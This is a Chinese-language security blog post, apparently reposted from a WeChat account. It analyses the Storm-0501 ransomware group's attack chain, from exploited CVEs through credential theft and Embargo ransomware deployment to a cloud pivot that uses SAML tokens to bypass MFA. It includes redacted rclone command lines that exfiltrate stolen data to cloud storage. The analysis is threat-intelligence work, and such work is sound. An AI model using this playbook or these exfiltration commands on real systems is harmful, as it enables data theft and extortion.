Storm-0501 勒索组织攻击手法浅析

admin 2024年10月3日14:50:32评论32 views字数 1599阅读5分19秒阅读模式
Storm-0501 勒索组织除了常规的APT攻击手段,还利窃取的凭据横向移动到云环境并部署后门,本篇简要分析一下该组织的攻击手法。

背景:

Storm-0501 是从2021年开始活跃的勒索组织,攻击目标多为米国的政府、制造业、运输和执法和医院。作为勒索软件即服务(RaaS)附属机构,部署过包括 Hive、BlackCat (ALPHV)、Hunters International、LockBit,以及最近的 Embargo 勒索软件。

攻击链路图:

Storm-0501 勒索组织攻击手法浅析

获取驻足点:

- 使用Storm-0249 和 Storm-0900的代理隧道访问

- 使用Nday,如下表:

漏洞编号 漏洞名称
CVE-2022-47966 ManageEngine 未授权RCE
CVE-2023-4966 Citrix NetScaler ADC 和 Gateway信息泄露

CVE-2023-29300

CVE-2023-38203

Adobe ColdFusion 反序列化漏洞

获取系统驻足点后信息收集:

  1. 系统工具:

    • systeminfo.exe: 用于获取设备的系统配置信息。

    • net.exe: 用于获取和管理网络资源。

    • nltest.exe: 用于检测和操作域及信任信息。

    • tasklist.exe: 用于查看正在运行的进程。

  2. 开源工具:

    • 使用 ossec-win32 和 OSQuery收集终端信息。

  3. 自定义脚本:

    • 使用经过混淆的ADRecon.ps1脚本(重命名为obfs.ps1或recon.ps1)进行域控信息收集。

取得本地设备的管理员权限后,继续使用以下方式获取更多用户凭据:

  1. Impacket的SecretsDump模块

  2. 使用EncryptedStore的Find-KeePassConfig.ps1 PowerShell脚本,输出KeePass数据库的位置以及密钥文件/用户主密钥信息

数据外传:

  1. Rclone工具

  2. 攻击者使用开源工具Rclone进行数据外传,并将其重命名为类似Windows系统文件的名称,如svhost.exe或scvhost.exe,以进行伪装。

  3. MegaSync

  4. 使用MegaSync将文件多线程传输到公共云存储服务。

  5. 命令行示例

    • Svhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11

    • scvhost.exe –config C:WindowsDebuga.conf copy [REDACTED UNC PATH] [REDACTED]

攻击者通过隐匿的多线程传输,将窃取的敏感数据从受感染设备中上传至云存储服务。

勒索软件部署

攻击者获取足够的权限并且拿到了敏感数据,部署双重勒索策略的Embargo勒索软件:先加密受害者的文件,然后使用被盗的敏感数据进行威胁,除非支付赎金。

Storm-0501 勒索组织攻击手法浅析

Embargo勒索软件信息泄露网站

在微软观察到的案例中,攻击者利用被入侵的域管理员账户,通过GPO在网络设备上注册名为 SysUpdate 的计划任务来分发Embargo勒索软件,使用的二进制文件名为PostalScanImporter.exe和win.exe。目标设备上的文件被加密后,其扩展名会更改为 .partial、.564ba1 和 .embargo。

Storm-0501 勒索组织攻击手法浅析

被加密后的文件

云环境渗透

攻击者利用窃取的Microsoft Entra ID(Azure AD)凭证,从本地环境横向移动到云环境,并通过后门在目标网络中建立持久访问,不再局限于受感染设备。

攻击者利用开源工具AADInternals,创建一个联合域并生成SAML令牌,以绕过多因素认证(MFA),登录各种应用(如Office 365等)。

Storm-0501 勒索组织攻击手法浅析

开源工具AADInternals官网截图

原文始发于微信公众号(KeepHack1ng):Storm-0501 勒索组织攻击手法浅析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月3日14:50:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Storm-0501 勒索组织攻击手法浅析https://cn-sec.com/archives/3229506.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息